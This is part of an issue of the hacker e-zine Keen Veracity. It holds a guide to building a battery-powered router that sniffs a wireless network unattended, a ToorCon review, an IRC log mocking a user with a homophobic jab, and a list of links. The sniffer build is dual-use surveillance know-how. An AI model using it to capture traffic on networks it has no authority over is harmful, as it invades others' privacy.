the Spy =============== What is Harriet the Spy? ------------------------ Harriet the Spy is designed to be a relatively low cost solution for creating a stationary battery-operated wireless packet capture system. Yes but what does that mean? ---------------------------- It means that it's a computer, whose only job is packet capture, and it can be left in one place for an extended period of time, to capture packets for a specific wireless network or set of wireless networks. What is it made of? ------------------- The most basic configuration for Harriet requires a 802.11a or b or g router that is similar or compatible with the Linksys WRT54G(S) series of routers, in that it can run an open source linux based firmware. For my experiments I used a WRT54G version 2 [1], and OpenWRT [2]. It also includes a battery pack made of 4 1.5v Alkaline batteries. How to make it. --------------- The Battery pack. +++++++++++++++++ The battery pack used will likely fall somewhere in this rough description no matter what kind of compatible router you get. The number of batteries you need might vary depending on the actual power usage of the router. I'm not an electrical engineer but I do know that most consumer electronics devices do not require the full output voltage of their DC wall adapters. The WRT54G's for instance has a power output of 12v DC. But it can on 6v DC without any problem. So the basic parts list for this part of the project is this: * 1 DC Size M plug. * 4 1.5v alkaline batteries. * 1 battery holder of the same size. In theory the only thing the cell of the battery would affect in this case would be runtime. So you could use anything from AA to D. I chose D for this as I just wanted to see how long I could keep it running for. The manufacture of this battery pack is very simple and requires very minimum soldering skill (read: you should know which end to hold.) Simply take the wires from the battery holder, and solder them to the positive and negative leads on the DC Size M plug. Insert the batteries into the holder, and that's all she wrote about that. You can now power any device which can be sustained on 6v DC. The Router and OS +++++++++++++++++ Flashing OpenWRT onto a WRT54G or compatible router is a well documented process, and can be found here [3]. The client mode configuration is also well documented and can be found here [4]. When installing kismet you should install the kismet_server package, and turn off the wireless interface prior to starting it. The Test -------- The base test for battery life was to plug in the router, start up kismet, and then take a voltage reading of each battery under load. Then after an hour I'd take the readings again, and approximate how many hours before the batteries were operating at less than 30% capacity. The initial readings where: 1.31, 1.36, 1.35, 1.34 for a total of 5.36V After two hours the voltages read: 1.01, 1.08, 1.05, 0.95 for 4.09V That's a 1.27V difference, if we assume the voltage drop to be linear then every two hours we would lose 1.27V, with 1.78V being the magical 30% capacity mark. So that's about 6hrs of battery life. Which isn't too shabby for the cost of production. You could capture a lot of packets in 6hrs. Potential Problems and Potential Improvements --------------------------------------------- So right now Harriet is capable of sitting around, for 6 hours unattended, and capture packets. Of course since it only has 4mb of storage if you're using a WRT54G, and 8mb if you're using a GS, it can only capture so many packets. Especially since atleast 2MB of flash is being taken up by the OS. However one planned improvement is to add an SD card [5], which will give up to 2GB of storage, other options would be adding a USB port and using an IDE storage device. Yet another option would be using a 802.11b ethernet bridge or usb 802.11b adapter connected to a nearby network for packet capture (just make sure you're not capturing that networks packets.) Another potential problem is that as the batteries lose power, one could potentially damage the router hardware. This problem could be overcome by adding a low-power cut-off circuit. Also the price of D-Cell lead-acid batteries is rather expensive over time, and one could find a much more suitable source of power, including rechargeable NiMH batteries like those used in RC Cars and Airsoft guns, or even the more expensive though very reliable and long lasting Li-Poly batteries for the higher end RC vehicles. Final Thoughts -------------- All things considered I believe the initial revision of Harriet the Spy is quite a success, the next steps in it's evolution will be the abovementioned low-power cut-off circuit, and the addition of an SD card reader. Then I hope to field test the device in a high traffic wireless deployment. After that I'll begin experimenting with a variety of rechargeable and longer lasting battery solutions. Footnotes --------- [1] http://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout&packedargs=c%3DL_Product_C2%26cid%3D1124916802645&pagename=Linksys%2FCommon%2FVisitorWrapper [2] http://www.openwrt.org/ [3] http://wiki.openwrt.org/OpenWrtDocs/Installing [4] http://wiki.openwrt.org/ClientModeHowto [5] http://wiki.openwrt.org/OpenWrtDocs/Customizing#head-00b294c0c885db1d544fbfcd48e9367d20b38b5a -------------------------------------------------------------------------------- [Review of ToorCon]===================================================[overdose] -------------------------------------------------------------------------------- Overview of Toorcon, San Diego California's premiere Security conference By OverDose Well first things first, I went to Toorcon , and the first night was a sort of meet and greet. There were a lot of people already there, people that were affiliated with defcon, Layer 1, and a few other conferences I had attended. There were hors d'oeuvres and an awesome social atmosphere. There were of course people talking about newer tools and recent compromises that were public and things that had happened to end users at the employer. Saturday was the day that things got swinging, there were 2 tracks of speakers cleverly name Smoke and Mirrors. The smoke track which is synonymous to digital security, had several speakers ranging from a BBS ( documentary about BBSes and a MUST WATCH) Q&A to how hackers get caught. On the other track Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous On the other track Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous communication for the Dept. of Defense..and you. Saturday night was awesome, the wonderful people at toorcon had set up a party for us in the Galileo 101 in downtown San Diego, really close to the convention center where Toorcon was held. It was a two story bar of sorts, with DJ's spinning lots of house, lounge, trance, and many other electronica styles. The drink were good but expensive. Never the less it was an awesome time to be had by ANY geek who was down for a party. Sunday Sept 18th, the day that was wrapping up the con, but don't let that fool you. There were many people still around and having an awesome time, chatting among each other as well as checking out the Sunday speeches. Sunday's Smoke track ran from everything from Infrared hacking to a law enforcement panel, and the Mirrors portion had Running a small hacker conference panel to the Future of Phishing, it really DID have it all and then some. I want to close by saying thanks to h1kari, nfiltr8, geo, phil,SoMe_BoDy, freshman, arachne, and everyone else that helped put Toorcon together. You guys did an awesome job. One thing I HAVE To bring up was the lax environment and the courtesy towards all of the attendees. If anyone has been to a hacker con, generally you get souvenirs that you must pay for, generally from a vendor area. This is one area that delightedly Toorcon differentiates itself, They gave EVERY attendee an official Toorcon shirt with dates/locations and things of this nature. How cool is it, that these people appreciate each and every attendee that they would give them all an awesome souvenir just for attending? That's all I can say about Toorcon, if you are in the mood for a relaxing and informative time in the San Diego area, I highly suggest you attend Toorcon. -------------------------------------------------------------------------------- [This issues LAMER.log]=====================================[#espionage @ efnet] -------------------------------------------------------------------------------- 1.9 GIGAHERTZ! 1.9 GIGAHERTZ! Yup! This, from the immature guy who went off on someone and told them to read an RF (radio frequency) book! ttransien also claims to be an ex l0pht member, but after talking to him for five minutes it's clear that he's too much of a moron to ever be in l0pht. [20:39] lothos [20:40] trans [20:40] you code? [20:40] wut [20:40] of course [20:40] I learned C [20:40] didn't you download myelite software like everyone else? [20:40] ttransien [20:40] no [20:40] :-o [20:40] haven't even seen it [20:40] * uplink sets mode: +vvvv Christ cia darkhmet lothos [20:40] * uplink sets mode: +vvvv migzy Rav^ v_id |-|acks [20:40] your bluetooth software? [20:40] :O [20:40] h0h0 mvoice [20:41] * uplink sets mode: -vvvv playd0h trans ttransien uplink [20:41] we're leet with +O's [20:41] we don't need voiced [20:41] we don't need voices [20:41] dewd don't play around you'll soon be out of control [20:41] h0h0h [20:41] I gotta go for a sec [20:41] brb [20:41] you are 17 it is easy to forget things and go out of control [20:41] bye >:D< [20:41] nevermind you are too young to hug that is way gay [20:45] h0h0 [20:58] hi [20:59] dood if i sit my cell phone by the monitor [20:59] my monitor flips out right before my ophone rings [20:59] iden is notorious for that [20:59] speakers as well [20:59] and tv [21:00] 1watt or so at maybe 1.9GHz [21:00] but 1.9GHz is not the refresh rate of my monitor! [21:00] and i doubt it's even a harmonic :D [21:00] so i wonder what's happening [21:02] those are the worst phones as far as radiation [21:02] i bet it does it if i make a call too [21:02] let me try [21:02] yup [21:02] and iden works on 800mhz [21:02] iden? [21:02] 806-866 MHz [21:02] nextel is not gsm [21:02] it is iden [21:02] why do you think i'm on that freq [21:03] if you have nextel that is your freq [21:03] dood i'm out of the states right now [21:03] as previously mentioned [21:03] Integrated Dispatch Enhanced Network [21:05] iden is 800mhz [21:05] you've mentioned that [21:05] yes [21:05] however i am not in the united states currently as mentioned two or three times [21:05] do you have a loaner phone? [21:05] a business phone [21:06] belongs to the company [21:06] did they give you a phone to use overseas? [21:06] no, the phone was already overseas [21:06] purchased locally [21:06] is that thru nextel? [21:06] of course not [21:06] we use the local network [21:06] europe? [21:06] asia [21:06] 900mhz or 1800mhz then [21:06] yo [21:06] I'm gonna get a 5mbit connection [21:06] not 1.9ghz [21:07] where do they use 1900 [21:07] the usa [21:07] 850/1900 is usa gsm [21:07] rgr [21:07] i'm guessing you're on 900 mhz from the way it interacts with the monitor [21:07] what in the monitor would resonate at 800mhz [21:07] who knows, i just know cellular [21:08] btw my nextel is gsm; it was advertised as such and i used it in singaporre [21:08] maybe it is then [21:08] i have to pay more for my plan [21:08] you should be able to use it in asia then [21:08] i am getting a call in [21:08] * Christ (c@220-245-133-132-vic-pppoe.tpgi.com.au) Quit (Ping timeout: 276 seconds^O) [21:08] i can see it :D [21:08] unless you're in south korea [21:08] they use cdma not gsm [21:08] or japan [21:08] japan does not use gsm [21:09] i don't know what bands my phone supports [21:09] i do have it in a box somewhere i just didn't try [21:09] * Christ (c@60-240-128-36.tpgi.com.au) has joined #espionage [21:09] what country are you in? [21:09] i have a locally purchased phone paid for y the company [21:09] i am in cyberia :D [21:14] anyway let's talk until my ride gets here [21:14] i have nothing else to do [21:14] entertain me [21:15] ok i'll begin [21:15] it is interesting to note that the interference only occurs before the phone rings [21:15] which leads me to believe 2 things [21:15] 1 - the phone ramps down power during negotiation with the tower [21:15] 2 - i have a good signal [21:15] 2 is confirmed by my signal bars on the display [21:16] uplink would you like to interject an observation at this point? [21:17] bbl [21:17] * ttransien (~transient@get-o.net) Quit (^B[^BBX^B]^B Pretzel Boy uses BitchX. Shouldn't you?^O) -------------------------------------------------------------------------------- [/dev/urandom]=========================================[Random Facts and links ] -------------------------------------------------------------------------------- # The Most Annoying way to make a pop-up, EVER. http://ha.ckers.org/popup.html # Make a website not display for people using Internet Explorer: This site will not display in Internet Explorer # SMS email gateways for the US cellular providers: Sprint: 10-digit-number@messaging.sprintpcs.com Verizon: 10-digit-nmber@vtext.com AT&T: 10-digit-number@mobile.att.net T Mobile: 10-digit-number@tmomail.net Nextel: 10-digit-number@messaging.nextel.com Cingular: 10-digit-number@mobile.mycingular.net Alltel: 10-digit-number@message.alltel.com # Practical Resources for Securing Computers: http://www.SecureThe.Net -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer (of systems and great walls alike). -------------------------------------------------------------------------------- All submissions to: kv@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____|[] \_____/[] \_____/[] z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2005 legions.org, all human rights reserved outside the US. -------------------------------------------------------------------------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]